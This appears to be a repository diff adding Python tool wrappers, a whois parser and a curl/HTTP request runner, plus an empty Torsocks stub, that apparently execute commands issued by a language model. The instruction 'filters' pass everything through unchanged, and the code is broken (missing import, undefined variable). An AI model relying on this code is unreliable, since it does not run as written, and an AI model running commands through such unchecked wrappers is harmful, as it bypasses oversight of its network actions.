from tools.ToolBase import ToolBase
class WhoisTool(ToolBase):
def validate_instruction(self, instruction):
#过滤
timeout = 0
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):
# 定义正则表达式模式来匹配所需的行
pattern = r"(Registrant:.*?\n|Registrant Contact Email:.*?\n|Sponsoring Registrar:.*?\n)"
# 使用re.findall()方法查找所有匹配项
matches = re.findall(pattern, result)
newresult = ""
# 打印结果
for match in matches:
newresult += match.strip()
if not newresult:
return result
return newresult

50
tools/__RequestTool.py

@ -0,0 +1,50 @@
#request工具类,来处理curl、http、https的页面访问等处理逻辑,后期考虑wget等
import requests
from tools.ToolBase import ToolBase
class RequestTool(ToolBase):
def validate_instruction(self, instruction_old):
#指令过滤
return instruction_old
def execute_instruction(self, instruction_old):
'''
执行指令验证合法性 -> 执行 -> 分析结果
:param instruction_old:
:return:
bool:true-正常返回给大模型false-结果不返回给大模型
str:执行的指令
str:执行指令的结果
'''
ext_params = self.create_extparams()
# 第一步:验证指令合法性
instruction,time_out = self.validate_instruction(instruction_old)
if not instruction:
return False,instruction_old,"该指令暂不执行!","",ext_params
# 第二步:执行指令
if instruction_old.startswith("curl"):
parts = instruction_old.split()
for i, part in enumerate(parts):
if part == "-H" and i + 1 < len(parts):
target = parts[i + 1]
elif instruction_old.startswith("http"):
pass
else:
print(f"{instruction_old}暂不支持")
return False, instruction_old, "该指令暂不执行!","",ext_params
# 第三步:分析执行结果
analysis = self.analyze_result(output,instruction)
#指令和结果入数据库
#?
return True,instruction, analysis,"",ext_params
def analyze_result(self, result,instruction):
#指令结果分析
return result
if __name__ == "__main__":
RT = RequestTool()

0
tools/__TorsocksTool.py

Loading…
Cancel
Save